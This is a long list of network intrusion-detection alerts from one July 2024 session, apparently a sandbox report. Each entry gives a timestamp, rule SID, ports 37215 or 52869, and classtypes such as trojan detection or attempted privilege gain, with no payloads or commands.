                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:42114
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:42072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.523834
                      SID:2027339
                      Source Port:51016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.377287
                      SID:2831300
                      Source Port:44758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.907864
                      SID:2025132
                      Source Port:58758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:55980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:58436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.551203
                      SID:2027339
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.609530
                      SID:2025132
                      Source Port:49530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.061926
                      SID:2025132
                      Source Port:33714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.062924
                      SID:2835222
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:41986
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2829579
                      Source Port:42306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.014684
                      SID:2829579
                      Source Port:59416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2829579
                      Source Port:60696
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2829579
                      Source Port:52214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.198496
                      SID:2027339
                      Source Port:51420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:42092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435097
                      SID:2829579
                      Source Port:34342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344794
                      SID:2027339
                      Source Port:49946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.454256
                      SID:2027339
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.438363
                      SID:2835222
                      Source Port:45252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.002596
                      SID:2027339
                      Source Port:50104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.238802
                      SID:2025132
                      Source Port:58360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2025132
                      Source Port:43668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2027339
                      Source Port:59368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2025132
                      Source Port:41926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2831300
                      Source Port:55966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2027339
                      Source Port:35166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.204459
                      SID:2025132
                      Source Port:33148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.770020
                      SID:2025132
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.636118
                      SID:2027339
                      Source Port:33580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.003393
                      SID:2025132
                      Source Port:41894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.677506
                      SID:2835222
                      Source Port:51824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2831300
                      Source Port:42036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.858612
                      SID:2835222
                      Source Port:32978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2027339
                      Source Port:44134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2027339
                      Source Port:47748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2831300
                      Source Port:46142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2025132
                      Source Port:40810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.607832
                      SID:2025132
                      Source Port:41712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.122986
                      SID:2831300
                      Source Port:54170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.158885
                      SID:2025132
                      Source Port:56206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2027339
                      Source Port:53874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.111365
                      SID:2025132
                      Source Port:54666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.834336
                      SID:2831300
                      Source Port:37212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.876678
                      SID:2025132
                      Source Port:37922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.204274
                      SID:2025132
                      Source Port:47144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2027339
                      Source Port:50772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.350524
                      SID:2025132
                      Source Port:56026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.742007
                      SID:2027339
                      Source Port:56132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.188277
                      SID:2835222
                      Source Port:33318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.793654
                      SID:2027339
                      Source Port:43974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.120599
                      SID:2829579
                      Source Port:36210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.644108
                      SID:2831300
                      Source Port:47652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2829579
                      Source Port:43694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.682403
                      SID:2831300
                      Source Port:46774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2027339
                      Source Port:49756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.106820
                      SID:2835222
                      Source Port:49394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382026
                      SID:2025132
                      Source Port:38150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:41540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.345649
                      SID:2835222
                      Source Port:35720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.266425
                      SID:2025132
                      Source Port:50808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.531304
                      SID:2027339
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:40202
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522257
                      SID:2835222
                      Source Port:41760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2829579
                      Source Port:50082
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.460952
                      SID:2831300
                      Source Port:60318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.372687
                      SID:2027339
                      Source Port:58556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.275898
                      SID:2025132
                      Source Port:35274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.953106
                      SID:2027339
                      Source Port:37928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.939285
                      SID:2025132
                      Source Port:59056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2027339
                      Source Port:57738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.301028
                      SID:2027339
                      Source Port:38242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2829579
                      Source Port:37912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2027339
                      Source Port:36640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2027339
                      Source Port:59640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:33066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.973674
                      SID:2025132
                      Source Port:59632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.031215
                      SID:2027339
                      Source Port:37284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2835222
                      Source Port:52708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994750
                      SID:2025132
                      Source Port:49016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:60812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.474846
                      SID:2831300
                      Source Port:33648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:02.655349
                      SID:2025132
                      Source Port:36218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2829579
                      Source Port:50730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2027339
                      Source Port:56114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.211571
                      SID:2027339
                      Source Port:57262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2831300
                      Source Port:40818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.403626
                      SID:2027339
                      Source Port:51702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2831300
                      Source Port:40262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2835222
                      Source Port:59972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.239423
                      SID:2027339
                      Source Port:36704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.791586
                      SID:2025132
                      Source Port:57930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.207184
                      SID:2831300
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.906267
                      SID:2027339
                      Source Port:43942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.953099
                      SID:2027339
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2831300
                      Source Port:34084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.913916
                      SID:2027339
                      Source Port:55038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:36280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2829579
                      Source Port:33164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.515904
                      SID:2829579
                      Source Port:52610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.351675
                      SID:2027339
                      Source Port:59062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2027339
                      Source Port:57006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.392754
                      SID:2829579
                      Source Port:51746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262546
                      SID:2027339
                      Source Port:50494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:53.291407
                      SID:2027339
                      Source Port:56922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.342827
                      SID:2831300
                      Source Port:46968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.886041
                      SID:2027339
                      Source Port:42154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2829579
                      Source Port:43640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:53914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.252148
                      SID:2025132
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.102642
                      SID:2027339
                      Source Port:50986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:57268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:42050
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2025132
                      Source Port:33902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.633204
                      SID:2831300
                      Source Port:52622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2025132
                      Source Port:45714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2829579
                      Source Port:41882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.240695
                      SID:2831300
                      Source Port:33480
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2027339
                      Source Port:47622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:34086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2831300
                      Source Port:58126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2831300
                      Source Port:33508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.694959
                      SID:2027339
                      Source Port:46848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.556052
                      SID:2027339
                      Source Port:56476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.125044
                      SID:2831300
                      Source Port:40538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.922875
                      SID:2027339
                      Source Port:55580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.614636
                      SID:2025132
                      Source Port:38052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.119462
                      SID:2829579
                      Source Port:45110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.557507
                      SID:2025132
                      Source Port:50146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2835222
                      Source Port:44530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2829579
                      Source Port:49484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430318
                      SID:2829579
                      Source Port:37110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.145992
                      SID:2829579
                      Source Port:40596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.234951
                      SID:2027339
                      Source Port:57612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.051223
                      SID:2835222
                      Source Port:51544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2831300
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:30.542349
                      SID:2025132
                      Source Port:41762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.563767
                      SID:2025132
                      Source Port:60768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.072925
                      SID:2027339
                      Source Port:46322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:56222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.267901
                      SID:2027339
                      Source Port:46356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.659618
                      SID:2829579
                      Source Port:60644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2835222
                      Source Port:48384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.348370
                      SID:2831300
                      Source Port:51242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.177523
                      SID:2831300
                      Source Port:35258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.373997
                      SID:2027339
                      Source Port:41662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.718240
                      SID:2027339
                      Source Port:56550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.069869
                      SID:2831300
                      Source Port:55724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.478723
                      SID:2027339
                      Source Port:34028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.528209
                      SID:2027339
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:08:34.140430
                      SID:2025132
                      Source Port:37366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.489811
                      SID:2027339
                      Source Port:52782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.554681
                      SID:2027339
                      Source Port:44714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.554556
                      SID:2831300
                      Source Port:56388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.343632
                      SID:2835222
                      Source Port:48312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2025132
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.184196
                      SID:2025132
                      Source Port:51722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:40838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.008667
                      SID:2027339
                      Source Port:33724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.575596
                      SID:2027339
                      Source Port:53664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2027339
                      Source Port:58508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.860812
                      SID:2027339
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.130961
                      SID:2027339
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.297548
                      SID:2027339
                      Source Port:49134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.641445
                      SID:2027339
                      Source Port:40180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.491493
                      SID:2831300
                      Source Port:43614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2027339
                      Source Port:40818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:40212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.205397
                      SID:2027339
                      Source Port:41782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.269587
                      SID:2831300
                      Source Port:56592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.191070
                      SID:2027339
                      Source Port:41646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.199925
                      SID:2027339
                      Source Port:37980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2025132
                      Source Port:42682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.594551
                      SID:2027339
                      Source Port:59248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.245416
                      SID:2027339
                      Source Port:45142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:35100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.658473
                      SID:2027339
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.437028
                      SID:2027339
